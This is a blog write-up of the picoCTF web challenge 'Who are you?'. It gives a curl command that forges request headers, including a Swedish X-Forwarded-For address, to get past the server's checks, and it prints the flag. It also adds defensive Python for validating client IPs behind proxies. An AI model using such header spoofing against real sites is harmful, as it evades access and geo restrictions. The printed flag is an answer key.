picoCTF Who are you? [100 points]
Who are you?
points:100
Description
Let me in. Let me iiiiiiinnnnnnnnnnnnnnnnnnnn http://mercury.picoctf.net:38322/
Hints
It ain’t much, but it’s an RFC https://tools.ietf.org/html/rfc2616
Solution
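At first, the page shows a hint: use PicoBrowser. Each message below is what the server returns next, followed by the request header that satisfies it.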
User-Agent: PicoBrowser
I don’t trust users visiting from another site.
Referer: http://mercury.picoctf.net:38322/
Sorry, this site only worked in 2018.
Date: 2018
I don’t trust users who can be tracked.
DNT: 1
This website is only for people from Sweden.
X-Forwarded-For: 2.16.66.0
You’re in Sweden but you don’t speak Swedish?
Accept-Language: sv
What can I say except, you are welcome
Set all of these headers with curl and send the request to get the flag:
curl 'http://mercury.picoctf.net:38322/' \
--header 'User-Agent: PicoBrowser' \
--header 'Referer: http://mercury.picoctf.net:38322/' \
--header 'Date: 2018' \
--header 'DNT: 1' \
--header 'X-Forwarded-For: 2.16.66.0' \
--header 'Accept-Language: sv'
flag: picoCTF{http_h34d3rs_v3ry_c0Ol_much_w0w_b22d773c}
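Every check above is satisfied by a header the client writes itself, including X-Forwarded-For for the Sweden test. The Python below is an added example, not part of the original write-up or the challenge's code: it contrasts a lookup that believes the header with one that starts from the TCP peer address. The function names, the 10.0.0.0/8 proxy range and the 203.0.113.x / 198.51.100.x sample addresses are assumptions made for illustration.

```python
import ipaddress

# Assumption: the only reverse proxies allowed to set X-Forwarded-For for this app.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def is_trusted_proxy(addr):
    """True if addr belongs to one of our own proxies (raises ValueError if malformed)."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in TRUSTED_PROXIES)


def naive_client_ip(peer_addr, headers):
    """Weak form: believes the client-supplied header, which the curl command relies on."""
    xff = headers.get("X-Forwarded-For")
    return xff.split(",")[0].strip() if xff else peer_addr


def resolve_client_ip(peer_addr, headers):
    """Hardened form: start from the TCP peer and only step through
    X-Forwarded-For entries that a trusted proxy appended."""
    if not is_trusted_proxy(peer_addr):
        return peer_addr  # direct connection: the header is entirely client-controlled
    raw = headers.get("X-Forwarded-For", "")
    hops = [h.strip() for h in raw.split(",") if h.strip()]
    # Walk right to left; the first address that is not our proxy is the real client.
    for hop in reversed(hops):
        try:
            if not is_trusted_proxy(hop):
                return hop
        except ValueError:
            return peer_addr  # malformed entry: fall back to the address we observed
    return peer_addr


if __name__ == "__main__":
    spoofed = {"X-Forwarded-For": "2.16.66.0"}  # header value from the write-up
    print(naive_client_ip("203.0.113.7", spoofed))    # 2.16.66.0
    print(resolve_client_ip("203.0.113.7", spoofed))  # 203.0.113.7
```

Any geo or allow-list decision should be made on the value returned by the hardened lookup; headers such as User-Agent, Referer, Date, DNT and Accept-Language have no trustworthy equivalent and should not gate access at all.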
Unless otherwise stated, all articles on this blog are licensed under CC BY-NC-SA 4.0. Please credit LuYee6813's Blog | 技術分享 when reposting.